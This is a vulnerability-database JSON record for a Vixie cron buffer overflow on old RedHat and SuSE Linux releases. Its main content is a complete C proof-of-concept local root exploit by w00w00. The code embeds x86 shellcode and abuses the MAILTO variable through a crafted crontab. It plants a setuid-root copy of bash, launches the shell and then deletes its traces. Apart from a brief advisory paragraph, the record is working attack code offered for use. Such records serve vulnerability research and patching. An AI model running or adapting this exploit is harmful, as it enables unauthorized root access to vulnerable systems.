DATABASE RESOURCES PRICING ABOUT US

{"href": "https://www.seebug.org/vuldb/ssvid-73393", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-73393", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/602/info\r\n \r\nThe version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. \r\n\r\n/*\r\n * VixieCron 3.0 Proof of Concept Exploit - w00w00\r\n * \r\n * Not only does Paul give up root with this one, but with his creative use of\r\n * strtok() he actually ends up putting the address of our shellcode in eip. \r\n * \r\n * Many Thanks: Cheez Wiz, Sangfroid\r\n * Thanks: stran9er, Shok\r\n * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00\r\n * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \\\r\n * defacement group here>\r\n * \r\n * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.\r\n * \r\n * -jbowie@el8.org\r\n * \r\n */\r\n \r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <pwd.h>\r\n\r\nchar shellcode[] =\r\n "\\xeb\\x40\\x5e\\x89\\x76\\x0c\\x31\\xc0\\x89\\x46\\x0b\\x89\\xf3\\xeb"\r\n "\\x27w00w00:Ifwewerehackerswedownyourdumbass\\x8d\\x4e"\r\n "\\x0c\\x31\\xd2\\x89\\x56\\x16\\xb0\\x0b\\xcd\\x80\\xe8\\xbb\\xff\\xff"\r\n "\\xff/tmp/w00w00";\r\n \r\nint \r\nmain(int argc,char *argv[])\r\n\r\n FILE *cfile,*tmpfile;\r\n struct stat sbuf;\r\n struct passwd *pw;\r\n int x;\r\n \r\n pw = getpwuid(getuid());\r\n \r\n chdir(pw->pw_dir);\r\n cfile = fopen("./cronny","a+");\r\n tmpfile = fopen("/tmp/w00w00","a+");\r\n \r\n fprintf(cfile,"MAILTO=");\r\n for(x=0;x<96;x++)\r\n fprintf(cfile,"w00w00 ");\r\n fprintf(cfile,"%s",shellcode);\r\n fprintf(cfile,"\\n* * * * * date\\n");\r\n fflush(cfile);\r\n\r\n fprintf(tmpfile,"#!/bin/sh\\ncp /bin/bash %s\\nchmod 4755 %s/bash\\n", pw->pw_dir,pw->pw_dir);\r\n fflush(tmpfile);\r\n \r\n fclose(cfile),fclose(tmpfile);\r\n \r\n chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);\r\n \r\n if(!(fork())) {\r\n execl("/usr/bin/crontab","crontab","./cronny",(char *)0);\r\n } else { \r\n printf("Waiting for shell be patient....\\n");\r\n for(;;) {\r\n if(!(stat("./bash",&sbuf))) {\r\n break;\r\n } else { sleep(5); }\r\n } \r\n if((fork())) {\r\n printf("Thank you for using w00warez!\\n");\r\n execl("./bash","bash",(char *)0);\r\n } else { \r\n remove("/tmp/w00w00");\r\n sleep(5);\r\n remove("./bash");\r\n remove("./cronny");\r\n execl("/usr/bin/crontab","crontab","-r",(char *)0);\r\n }\r\n }\r\n}\r\n\n ", "id": "SSV:73393", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T16:13:50", "reporter": "Root", "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645247580, "score": 1659785532}}

{}